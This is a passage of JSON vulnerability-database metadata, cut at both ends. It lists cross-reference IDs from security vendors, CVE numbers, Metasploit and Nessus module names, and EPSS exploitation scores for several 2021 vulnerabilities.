"THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", 
"THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:B79D0A844D2D8BF7A75F2D397398D75A", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B879E243998561911585BBD37B7F33E9", 
"THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C23B7DE85B27B6A8707D0016592B87A3", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:CF9E25BD324C5940B0795721CA134155", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", 
"THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F006B56821C572012C6CBF003C78C596", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", 
"THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FF67AF009F2F0031599099334F6CC306", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883", "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034", "TRENDMICROBLOG:B5EA1F5E613C3A15D832147CF064EC78", "TRENDMICROBLOG:C9F6DD38959C2193331C83CA846C0A71"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-21139", "UB:CVE-2021-21148", "UB:CVE-2021-21166"]}, {"type": "veracode", "idList": ["VERACODE:29110", "VERACODE:29323", "VERACODE:29632"]}, {"type": "vmware", "idList": ["VMSA-2021-0002"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0", "WALLARMLAB:C5940EBF622709A929825B8B12592EF5"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119", "1337DAY-ID-35863", "1337DAY-ID-35879", "1337DAY-ID-35912", "1337DAY-ID-35944", "1337DAY-ID-36024", "1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36472", "1337DAY-ID-37433"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "adobe", "idList": ["APSB21-09"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070"]}, {"type": "archlinux", "idList": ["ASA-202102-4", "ASA-202103-19"]}, {"type": "attackerkb", "idList": 
["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "AKB:06000FAE-591B-46C7-8573-3D63BDDD0D13", "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "AKB:4BB453DC-4A7E-4FAF-832B-C5079208A3DA", "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "AKB:5ACC27EC-B7F2-405F-B3D6-009D27A1C386", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "AKB:9B59AD71-CB71-4C61-A639-5DC0E582DDC2", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:A85EDE41-3F67-480B-8858-46B5D866EB51", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A"]}, {"type": "canvas", "idList": ["ETERNALBLUE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1009", "CPAI-2018-0018", "CPAI-2021-0001", "CPAI-2021-0032", "CPAI-2021-0066", "CPAI-2021-0099", "CPAI-2021-0106", "CPAI-2021-0107", "CPAI-2021-0108", "CPAI-2021-0482"]}, {"type": "chrome", "idList": ["GCSA-2763659147289736801", "GCSA-3803715665928870837", "GCSA-8963246051762193641"]}, {"type": "cisa", "idList": ["CISA:16DE226AFC5A22020B20927D63742D98", "CISA:911DE59572B6EF78B42DD868D622F637", "CISA:CB32DB4C2EA92462F387E1DA6C08F57E", "CISA:F7C7CFE30EB8A6B7C1DCDEA50F649F74"]}, {"type": "cve", "idList": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", 
"CVE-2021-27065"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4846-1:CCE83", "DEBIAN:DSA-4858-1:7131E", "DEBIAN:DSA-4886-1:0EF07"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-21139", "DEBIANCVE:CVE-2021-21148", "DEBIANCVE:CVE-2021-21166"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163", "EDB-ID:49602"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fedora", "idList": ["FEDORA:4E16930B130B", "FEDORA:87F5C30A253B", "FEDORA:A017F3074280", "FEDORA:BB03930B3A56", "FEDORA:BF4FC30A0346", "FEDORA:C67773052A4D", "FEDORA:E0A463072F31"]}, {"type": "fireeye", "idList": ["FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:C650A7016EEAD895903FB350719E53E3"]}, {"type": "freebsd", "idList": ["4ED0E43C-5CEF-11EB-BAFD-3065EC8FD3EC", "F00B65D8-7CCB-11EB-B3BE-E09467587C17"]}, {"type": "gentoo", "idList": ["GLSA-202101-13"]}, {"type": "githubexploit", "idList": ["F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E"]}, {"type": "hackerone", "idList": ["H1:1119224", "H1:1119228"]}, {"type": "hivepro", "idList": ["HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11170", "KLA12044", "KLA12048", "KLA12049", "KLA12062", "KLA12063", "KLA12071", "KLA12072", "KLA12075", "KLA12103", "KLA12106", "KLA12107", "KLA12108", "KLA12112", "KLA12178", "KLA12179"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:4F19DF7091060B198B092ABE2F7E1AA8", "KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:83CB7FE17AB0EB62BC1947A917C7546C", "KREBS:B3F20C0C41C613971FDADBAE93382CDF"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55", "MALWAREBYTES:232C556149FB9AC828C416ADCCF93766", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", 
"MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:C38FDAA2A9E5E349305313C6D17A0D3A"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/EXCHANGE_PROXYLOGON_COLLECTOR/", "MSF:AUXILIARY/SCANNER/HTTP/EXCHANGE_PROXYLOGON/", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_PROXYLOGON_RCE/", "MSF:ILITIES/FREEBSD-CVE-2021-21159/", "MSF:ILITIES/MSFT-CVE-2021-26857/", "MSF:ILITIES/MSFT-CVE-2021-26858/"]}, {"type": "mmpc", "idList": ["MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2018-0802", "MS:CVE-2021-1647", "MS:CVE-2021-1732", "MS:CVE-2021-21139", "MS:CVE-2021-21166", "MS:CVE-2021-24074", "MS:CVE-2021-24086", "MS:CVE-2021-24092", "MS:CVE-2021-24094", "MS:CVE-2021-26411", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011604", "KB4011618", "KB4011643", "KB5000800", "KB5000809"]}, {"type": "msrc", "idList": ["MSRC:E730BB5421ADC3C2D8E7B5B1C5CD88FB", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201892253"]}, {"type": "nessus", "idList": ["701323.PASL", "ADOBE_ACROBAT_APSB21-09.NASL", "ADOBE_READER_APSB21-09.NASL", "DEBIAN_DSA-4846.NASL", "DEBIAN_DSA-4858.NASL", "DEBIAN_DSA-4886.NASL", "EXCHANGE_CVE-2021-26855.NBIN", "FEDORA_2021-05AFA65D39.NASL", "FEDORA_2021-48866282E5.NASL", "FEDORA_2021-7FB30B9381.NASL", 
"FEDORA_2021-C88A96BD4B.NASL", "FREEBSD_PKG_3E01AAD2680E11EB83E2E09467587C17.NASL", "FREEBSD_PKG_4ED0E43C5CEF11EBBAFD3065EC8FD3EC.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "GENTOO_GLSA-202101-13.NASL", "GOOGLE_CHROME_88_0_4324_96.NASL", "GOOGLE_CHROME_89_0_4389_72.NASL", "HAFNIUM_IOC_DETECT.NBIN", "MACOSX_GOOGLE_CHROME_88_0_4324_96.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "MACOS_ADOBE_ACROBAT_APSB21-09.NASL", "MACOS_ADOBE_READER_APSB21-09.NASL", "MICROSOFT_EDGE_CHROMIUM_88_0_705_50.NASL", "MICROSOFT_EDGE_CHROMIUM_88_0_705_63.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "OPENSUSE-2021-166.NASL", "OPENSUSE-2021-267.NASL", "OPENSUSE-2021-296.NASL", "OPENSUSE-2021-392.NASL", "SMB_NT_MS21_FEB_4601318.NASL", "SMB_NT_MS21_FEB_4601331.NASL", "SMB_NT_MS21_FEB_FEP.NASL", "SMB_NT_MS21_FEB_WIN_DEFENDER.NASL", "SMB_NT_MS21_JAN_FEP.NASL", "SMB_NT_MS21_JAN_WIN_DEFENDER.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "VMWARE_VCENTER_VMSA-2021-0002.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226", "PACKETSTORM:161527", "PACKETSTORM:161590", "PACKETSTORM:161695", "PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3", "QUALYSBLOG:B847D61CCF30D86B3C35C9E4CA764114"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", 
"RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3", "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5", "RAPID7BLOG:BE902C7628D3F969596F8BE1DD0207C1", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502"]}, {"type": "saint", "idList": ["SAINT:192E33BC51A49F81EC3C52F0E8A72432", "SAINT:8E748D4A2FD6DFA108D87FF09FFEF2AE"]}, {"type": "securelist", "idList": ["SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:A3D3514100806269750A23D748D34C59", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "SECURELIST:F1FC61836DCAA7F1E27411092B208523"]}, {"type": "seebug", "idList": ["SSV:99168", "SSV:99189", "SSV:99260"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0166-1", "OPENSUSE-SU-2021:0173-1", "OPENSUSE-SU-2021:0177-1", "OPENSUSE-SU-2021:0186-1", "OPENSUSE-SU-2021:0267-1", "OPENSUSE-SU-2021:0276-1", "OPENSUSE-SU-2021:0296-1", "OPENSUSE-SU-2021:0392-1", "OPENSUSE-SU-2021:0401-1", "OPENSUSE-SU-2021:0413-1", "OPENSUSE-SU-2021:0973-1", "OPENSUSE-SU-2021:1016-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46"]}, {"type": "thn", "idList": ["THN:0C87C22B19E7073574F7BA69985A07BF", "THN:15BF409706D7240A5276C705732D745F", 
"THN:1628F014C29F23FB8C8FF7EBC7ADC137", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "THN:814DFC4A310E0C39823F3110B0457F8C", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:970890B8E519A3BC5427798160F5F09C", "THN:9AB21B61AFE09D4EEF533179D0907C03", "THN:9CF96D7230D0DBA395C1DEDA718226AD", "THN:9DB02C3E080318D681A9B33C2EFA8B73", "THN:A73831555CB04403ED3302C1DDC239B1", "THN:ABF9BC598B143E7226083FE7D2952CAE", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BBBFDA7EEE18F813A5DA572FD390D528", "THN:BC8A83422D35DB5610358702FCB4D154", "THN:BE0D8117CAD7D5DE97C405935DA09BC3", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:CDCF433A7837180E1F294791C672C5BB", "THN:DADA9CB340C28F942D085928B22B103F", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "THN:F163C7AB35BEF8E28924E14B02752181", "THN:F197A729A4F49F957F9D5910875EBAAA", "THN:FA40708E1565483D14F9A31FC019FCE1", "THN:FA6A50184463DFCD20073D5EDD0F36F2"]}, {"type": "threatpost", "idList": ["THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:18C67680771D8DB6E95B3E3C7854114F", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "THREATPOST:34CC110D7F26B1B4D3B97BE05F000B69", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "THREATPOST:62A15BEBBD95FBF8704B78058BF030F1", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", 
"THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:B79D0A844D2D8BF7A75F2D397398D75A", "THREATPOST:B879E243998561911585BBD37B7F33E9", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:CF9E25BD324C5940B0795721CA134155", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "THREATPOST:F006B56821C572012C6CBF003C78C596", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:FF67AF009F2F0031599099334F6CC306", "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-21139", "UB:CVE-2021-21148", "UB:CVE-2021-21166"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-2523", "epss": "0.960690000", "percentile": "0.991190000", "modified": "2023-03-17"}, {"cve": "CVE-2017-11882", "epss": "0.974500000", "percentile": "0.998980000", "modified": "2023-03-16"}, {"cve": "CVE-2018-0802", "epss": "0.974870000", "percentile": "0.999420000", "modified": "2023-03-16"}, {"cve": "CVE-2021-1647", "epss": "0.973570000", "percentile": "0.997930000", "modified": "2023-03-17"}, {"cve": "CVE-2021-1732", 
"epss": "0.003950000", "percentile": "0.692850000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21017", "epss": "0.675240000", "percentile": "0.973430000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21139", "epss": "0.001510000", "percentile": "0.495200000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21148", "epss": "0.013990000", "percentile": "0.843720000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21166", "epss": "0.026870000", "percentile": "0.887900000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21972", "epss": "0.973850000", "percentile": "0.998170000", "modified": "2023-03-17"}, {"cve": "CVE-2021-24074", "epss": "0.215380000", "percentile": "0.956590000", "modified": "2023-03-17"}, {"cve": "CVE-2021-24086", "epss": "0.001350000", "percentile": "0.469640000", "modified": "2023-03-16"}, {"cve": "CVE-2021-24092", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-24094", "epss": "0.215380000", 